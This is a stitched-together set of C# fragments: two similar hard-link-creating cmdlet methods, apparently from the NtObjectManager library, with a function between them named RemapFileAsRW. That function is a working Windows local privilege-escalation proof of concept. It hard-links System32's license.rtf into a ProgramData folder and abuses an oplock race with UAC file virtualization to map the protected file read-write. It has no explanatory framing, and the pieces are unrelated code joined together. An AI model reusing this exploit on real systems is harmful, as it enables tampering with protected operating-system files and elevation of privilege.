/// <summary>
/// Method to create an object from a set of object attributes.
/// </summary>
/// <param name="obj_attributes">The object attributes to create/open from.</param>
/// <returns>The newly created object.</returns>
protected override object CreateObject(ObjectAttributes obj_attributes)
{
using (NtFile file = (NtFile)base.CreateObject(obj_attributes))
{
if (LinkRoot == null && Win32Path)
{
LinkPath = ResolveWin32Path(SessionState, LinkPath);
}
file.CreateHardlink(LinkPath, LinkRoot, ReplaceIfExists, true);
}
return(null);
}
static NtSection RemapFileAsRW()
{
string base_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "luafv_" + Guid.NewGuid());
Console.WriteLine("Base Path: {0}", base_path);
DirectorySecurity dir_sd = new DirectorySecurity();
Directory.CreateDirectory(base_path);
string target_path = NtFileUtils.DosFileNameToNt(Path.Combine(base_path, "dummy.txt"));
string license_file = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "license.rtf");
Console.WriteLine("Trying to map {0} R/W", license_file);
NtFile.CreateHardlink(NtFileUtils.DosFileNameToNt(license_file), target_path);
using (var oplock_file = NtFile.Open(target_path, null, FileAccessRights.ReadAttributes, FileShareMode.All, FileOpenOptions.NonDirectoryFile))
{
var oplock = oplock_file.RequestOplockAsync(OplockLevelCache.Read | OplockLevelCache.Write, RequestOplockInputFlag.Request);
Console.WriteLine("Started oplock");
SetVirtualization(true);
Console.WriteLine("Opening file");
using (var file = NtFile.Open(target_path, null, FileAccessRights.GenericRead
| FileAccessRights.GenericWrite, FileShareMode.All,
FileOpenOptions.NonDirectoryFile | FileOpenOptions.CompleteIfOplocked))
{
SetVirtualization(false);
Console.WriteLine("{0} {1}", NtProcess.Current.ProcessId, file.Handle.DangerousGetHandle());
Console.WriteLine("{0} {1}", file.FullPath, file.GrantedAccess);
CreateVirtualStoreFile(target_path, GetDummyBuffer());
var async_read = file.ReadAsync(1, 0);
if (!oplock.Wait(10000))
{
throw new Exception("Oplock Timed Out");
}
Console.WriteLine("Oplock Fired");
EaBuffer ea = new EaBuffer();
ea.AddEntry("Hello", new byte[16], EaBufferEntryFlags.None);
// Set EA to force the delayed virtualization to complete without triggering oplock.
Console.WriteLine("Setting EA");
file.SetEa(ea);
Console.WriteLine("File now {0}", file.FullPath);
oplock_file.Close();
Console.WriteLine("Closed oplock_file");
if (!async_read.Wait(10000))
{
throw new Exception("Async Read Timed Out");
}
Console.WriteLine("Read Complete");
return NtSection.Create(null, SectionAccessRights.MaximumAllowed, null,
MemoryAllocationProtect.ReadWrite, SectionAttributes.Commit, file);
}
}
}
/// <summary>
/// Method to create an object from a set of object attributes.
/// </summary>
/// <param name="obj_attributes">The object attributes to create/open from.</param>
/// <returns>The newly created object.</returns>
protected override object CreateObject(ObjectAttributes obj_attributes)
{
using (NtFile file = (NtFile)base.CreateObject(obj_attributes))
{
if (LinkRoot == null && ResolveLinkName)
{
LinkName = PSUtils.ResolveWin32Path(SessionState, LinkName);
}
if (LinkFlags == 0)
{
file.CreateHardlink(LinkName, LinkRoot, ReplaceIfExists);
}
else
{
if (ReplaceIfExists)
{
LinkFlags |= FileRenameInformationExFlags.ReplaceIfExists;
}
file.CreateHardlinkEx(LinkName, LinkRoot, LinkFlags);
}
}
return(null);
}